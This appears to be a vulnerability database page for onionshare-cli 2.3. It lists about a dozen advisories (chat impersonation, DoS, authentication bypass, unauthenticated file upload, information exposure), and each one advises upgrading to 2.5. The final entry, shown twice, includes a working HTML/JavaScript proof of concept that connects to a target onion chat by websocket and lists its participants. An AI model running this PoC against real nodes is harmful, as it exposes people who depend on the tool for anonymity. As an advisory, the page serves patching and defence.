onionshare-cli 2.3 vulnerabilities

Known vulnerabilities in the onionshare-cli package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability	Vulnerable Version
M Improper Input Validation onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Improper Input Validation where an attacker with access to the chat environment can use the rename feature to impersonate other participants by adding whitespace characters at the end of the username. How to fix Improper Input Validation? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
L Access Restriction Bypass onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Access Restriction Bypass when a user opens the chatroom without emitting the join message he will not be present in `session.users[x]` list. Therefore there is no listing in the frontend and no chat participant knows another party joined the chat. Note: for remediation, it is recommended to allow chat access only after emission of the join event and to implement proper session handling. How to fix Access Restriction Bypass? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
M Denial of Service (DoS) onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Denial of Service (DoS) via an undisclosed vulnerability in the `QT image` parsing. Note: To be abused, this vulnerability requires rendering in the history tab, so some user interaction is required. How to fix Denial of Service (DoS)? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
M Authentication Bypass onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Authentication Bypass where an attacker with access to the chat environment can spoof his leave event but still persist in the chat with access to all sent messages and the possibility to write in the chat How to fix Authentication Bypass? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
L Incorrect Permission Assignment for Critical Resource onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Incorrect Permission Assignment for Critical Resource. The website mode of the application allows to use a hardened CSP, which will block any scripts and external resources. How to fix Incorrect Permission Assignment for Critical Resource? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
M Improper Authentication onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Improper Authentication where anyone with access to the chat environment can write messages disguised as another chat participant. How to fix Improper Authentication? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
H Denial of Service (DoS) onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Denial of Service (DoS) via the receive mode which limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An attacker with access to the receive mode can block file upload for others. How to fix Denial of Service (DoS)? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
H Improper Input Validation onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Improper Input Validation due to missing sanitization of the path parameter of the requested URL before being passed to the QT frontend. How to fix Improper Input Validation? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
M Information Exposure onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Information Exposure where an attacker with a primitive that allows for filesystem access from the context of the Onionshare process can access sensitive files in the entire user home folder. How to fix Information Exposure? Upgrade `onionshare-cli` to version 2.5 or higher.	[,2.5)
C Arbitrary File Upload onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Arbitrary File Upload by unauthenticated remote users, via the `--receive` functionality, which initiates the file upload process before checking for Flask HTTPAuth. How to fix Arbitrary File Upload? Upgrade `onionshare-cli` to version 2.5 or higher.	[0,2.5)
M Information Exposure onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service. Affected versions of this package are vulnerable to Information Exposure via the `chat_mode.py` file, which allows remote unauthenticated attackers to connect via websocket and to retrieve the full list of participants of a non-public `OnionShare` node via the `--chat` feature. The leak of chat participants happened when emitting `joined` message in the websocket channel. ###PoC <!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body> <h1>OnionShare Disclosure of Connected Users PoC</h1> <ul id="user-list"></ul> <script src="https://cdn.socket.io/3.1.1/socket.io.min.js" crossorigin="anonymous"> </script> <script src="https://code.jquery.com/jquery-3.5.1.min.js"> </script> <script> $(function () { $(document).ready(function () { var socket = io.connect( 'http://<target Onion v3 address>.onion/chat', { transports: ['websocket'] } ); socket.on('connect', function () { socket.emit('joined', { } ); } ); socket.on('status', function (data) { var userListHTML = ''; var userslist = data.connected_users; for (i = 0; i < userslist.length; i++) { userListHTML += `<li>${userslist[i]}</li>`; } $('#user-list').html(userListHTML); } ); } ); } ); </script> </body> </html> How to fix Information Exposure? Upgrade `onionshare-cli` to version 2.5 or higher.	[0,2.5)

Vulnerability

Vulnerable Version

Improper Input Validation

onionshare-cli is a software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third party file-sharing service.

Affected versions of this package are vulnerable to Improper Input Validation where an attacker with access to the chat environment can use the rename feature to impersonate other participants by adding whitespace characters at the end of the username.

How to fix Improper Input Validation?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Access Restriction Bypass

Affected versions of this package are vulnerable to Access Restriction Bypass when a user opens the chatroom without emitting the join message he will not be present in session.users[x] list. Therefore there is no listing in the frontend and no chat participant knows another party joined the chat. Note: for remediation, it is recommended to allow chat access only after emission of the join event and to implement proper session handling.

How to fix Access Restriction Bypass?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Denial of Service (DoS)

Affected versions of this package are vulnerable to Denial of Service (DoS) via an undisclosed vulnerability in the QT image parsing. Note: To be abused, this vulnerability requires rendering in the history tab, so some user interaction is required.

How to fix Denial of Service (DoS)?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Authentication Bypass

Affected versions of this package are vulnerable to Authentication Bypass where an attacker with access to the chat environment can spoof his leave event but still persist in the chat with access to all sent messages and the possibility to write in the chat

How to fix Authentication Bypass?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Incorrect Permission Assignment for Critical Resource

Affected versions of this package are vulnerable to Incorrect Permission Assignment for Critical Resource. The website mode of the application allows to use a hardened CSP, which will block any scripts and external resources.

How to fix Incorrect Permission Assignment for Critical Resource?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Improper Authentication

Affected versions of this package are vulnerable to Improper Authentication where anyone with access to the chat environment can write messages disguised as another chat participant.

How to fix Improper Authentication?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Denial of Service (DoS)

Affected versions of this package are vulnerable to Denial of Service (DoS) via the receive mode which limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An attacker with access to the receive mode can block file upload for others.

How to fix Denial of Service (DoS)?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Improper Input Validation

Affected versions of this package are vulnerable to Improper Input Validation due to missing sanitization of the path parameter of the requested URL before being passed to the QT frontend.

How to fix Improper Input Validation?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Information Exposure

Affected versions of this package are vulnerable to Information Exposure where an attacker with a primitive that allows for filesystem access from the context of the Onionshare process can access sensitive files in the entire user home folder.

How to fix Information Exposure?

Upgrade onionshare-cli to version 2.5 or higher.

[,2.5)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload by unauthenticated remote users, via the --receive functionality, which initiates the file upload process before checking for Flask HTTPAuth.

How to fix Arbitrary File Upload?

Upgrade onionshare-cli to version 2.5 or higher.

[0,2.5)

Information Exposure

Affected versions of this package are vulnerable to Information Exposure via the chat_mode.py file, which allows remote unauthenticated attackers to connect via websocket and to retrieve the full list of participants of a non-public OnionShare node via the --chat feature. The leak of chat participants happened when emitting joined message in the websocket channel.

###PoC

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
  </head>
  <body>
    <h1>OnionShare Disclosure of Connected Users PoC</h1>
    <ul id="user-list"></ul>
    <script src="https://cdn.socket.io/3.1.1/socket.io.min.js" crossorigin="anonymous">
    </script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js">
    </script>
    <script> 
      $(function () {
        $(document).ready(function () {
          var socket = io.connect(
            'http://<target Onion v3 address>.onion/chat',
            {
              transports: ['websocket']
            }
          );
          socket.on('connect', function () {
            socket.emit('joined', {
            }
           );
          }
         );
          socket.on('status', function (data) {
            var userListHTML = '';
            var userslist = data.connected_users;
            for (i = 0; i < userslist.length; i++) {
              userListHTML += `<li>${userslist[i]}</li>`;
            }
            $('#user-list').html(userListHTML);
          }
         );
        }
       );
      }
       );
    </script>
  </body>
</html>

How to fix Information Exposure?

Upgrade onionshare-cli to version 2.5 or higher.

[0,2.5)

onionshare-cli@2.3 vulnerabilities

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

How to fix?